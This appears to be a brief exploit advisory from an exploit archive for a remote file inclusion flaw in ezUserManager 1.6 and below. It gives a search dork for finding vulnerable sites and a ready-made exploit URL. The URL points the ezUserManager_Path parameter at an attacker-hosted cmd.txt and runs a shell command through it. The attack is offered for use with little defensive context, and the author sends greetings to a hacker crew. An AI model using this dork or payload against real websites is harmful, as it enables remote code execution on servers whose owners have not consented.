ezUserManager versions 1.6 and below suffer from a remote file inclusion vulnerability.
283204428b9d04c844c621690daa6e8664c7c75f0254da343e23d718c9bdd343
Title : ezUserManager <= v1.6 Remote File Inclusion
-
URL : http://www.ezusermanager.com/
-
Dork : "powered by ezUserManager"
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls